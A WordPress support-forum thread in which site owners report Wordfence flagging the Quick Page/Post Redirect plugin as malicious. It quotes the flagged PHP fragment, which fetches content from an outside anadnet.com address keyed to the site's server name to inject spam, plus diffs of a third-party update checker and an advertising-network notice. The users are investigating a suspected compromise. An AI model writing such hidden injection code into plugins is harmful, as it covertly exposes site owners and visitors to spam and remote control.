Wordfence Flagging Plugin As Hacked

  • mpedersen

    (@mpedersen)


    2 years ago

    “File appears to be malicious or unsafe: wp-content/plugins/quick-pagepost-redirect-plugin/page_post_redirect_plugin.php
    Type: File”

    /wp-content/plugins/quick-pagepost-redirect-plugin/page_post_redirect_plugin.php
    File Type: Plugin
    Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: !defined(‘CREDIT’)) {\x0d\x0a\x09\x09\x09\x09\x09$ctx=stream_context_create(array(‘http’=>array(‘timeout’ => 3)));\x0d\x0a\x09\x09\x09\x09\x09try{\x0d\x0a\x09\x09\x09\x09\x09\x09$credit=@file_get_contents(‘https://w.anadnet.com/bro/3/’.$_SERVER[‘SERVER_NAME’] . $_SE…

    The issue type is: Suspicious:PHP/CREDIT.content_injection.13029
    Description: Suspicious PHP code that injects SPAM into site content

    After a reinstall and a fresh scan, Wordfence still thinks there are problems.

    Modified plugin file: wp-content/plugins/quick-pagepost-redirect-plugin/page_post_redirect_plugin.php
    Type: File

    Details: This file belongs to plugin "Quick Page/Post Redirect Plugin" version "5.2.3" and has been modified from the file that is distributed by www.ads-software.com for this version. Please use the link to see how the file has changed. If you have modified this file yourself, you can safely ignore this warning. If you see a lot of changed files in a plugin that have been made by the author, then try uninstalling and reinstalling the plugin to force an upgrade. Doing this is a workaround for plugin authors who don't manage their code correctly.

    And, it appears, that among other things:

    36	// update functionality 
 	 	37	require dirname(__FILE__).'/updater/plugin-update-checker.php'; 
 	 	38	$myUpdateChecker = Puc_v4_Factory::buildUpdateChecker( 
 	 	39	   //'https://anadnet.com/updates/plugin.json', 
 	 	40	   'https://anadnet.com/updates/?action=get_metadata&slug=quick-pagepost-redirect-plugin', 
 	 	41	   __FILE__, //Full path to the main plugin file or functions.php. 
 	 	42	   'quick-pagepost-redirect-plugin' 
 	 	43	);
Viewing 7 replies - 1 through 7 (of 7 total)
  • Thread Starter mpedersen

    (@mpedersen)

    Reviewing the “differences”, it appears that the “ad supported network” code is also back! I’m in the process of investigating the copy of the plugin that I downloaded to verify:

    160	   function ppr_notice_hook() { 
 	 	161	       add_filter( 'plugin_row_meta', array( $this, 'ppr_add_notice' ), 10, 2 ); 
 	 	162	       add_action( 'upgrader_process_complete', function ( $upgrader_object, $options ) { 
 	 	163	           $our_plugin = plugin_basename( __FILE__ ); 
 	 	164	 
 	 	165	           if ( $options['action'] == 'update' && $options['type'] == 'plugin' && isset( $options['plugins'] ) ) { 
 	 	166	               foreach ( $options['plugins'] as $plugin ) { 
 	 	167	                   if ( $plugin == $our_plugin ) { 
 	 	168	                       update_option( 'ppr_show_notice', 0 ); 
 	 	169	                   } 
 	 	170	               } 
 	 	171	           } 
 	 	172	       }, 10, 2 ); 
 	 	173	   } 
 	 	174	 
 	 	175	   function ppr_add_notice( $links_array, $plugin_file_name ) { 
 	 	176	       if ( strpos( $plugin_file_name, basename(__FILE__) ) ) { 
 	 	177	           if ( (! $this->ppr_show_notice && current_user_can('administrator')) || (! $this->ppr_first_install && current_user_can('administrator')) ) { 
 	 	178	               $links_array[] = '<div class="notice notice-warning inline">Quick Page/Post Redirect Plugin contains advertising support - by installing and/or using it, the plug-in will become part of an advertising-supported network. <br>The plug-in may be purchased without advertising support at <a href="https://anadnet.com/pro/" target="_blank">anadnet.com/pro/</a>.</div>'; 
 	 	179	 
 	 	180	               update_option( 'ppr_show_notice', 1 ); 
 	 	181	               update_option( 'ppr_first_install', 1 ); 
 	 	182	           } 
 	 	183	       } 
 	 	184	 
 	 	185	       return $links_array; 
 	 	186	   } 
 	 	187
    Thread Starter mpedersen

    (@mpedersen)

    And, once the scan completes, the version I uploaded from WordPress is still having the original “hacked” messaging.

    Thread Starter mpedersen

    (@mpedersen)

    OK, potentially the conflict was from installing an older copy. I’ve reinstalled from WP on multiple sites and re-scanned, and Wordfence is now happy. Not sure where/what the “hack” came from, but it showed up on all sites it seems.

    Thread Starter mpedersen

    (@mpedersen)

    Looking at all the unanswered stuff, and the security type problems that seem to plague this formerly good plugin, I’m trying out https://www.ads-software.com/plugins/redirection/ – imports the redirects from this one, so that’s a start.

    Jeff Cohan

    (@jdcohan)

    Can we have a response from the authors, please? I, too, received this critical warning from WordFence.

    Maybe this will become a different kind of METOO movement? Am also seeing this “hacked” message in Wordfence.

    Come on author(s), where is a response to this?

    I have the exact same issue. Following this thread

Viewing 7 replies - 1 through 7 (of 7 total)
  • The topic ‘Wordfence Flagging Plugin As Hacked’ is closed to new replies.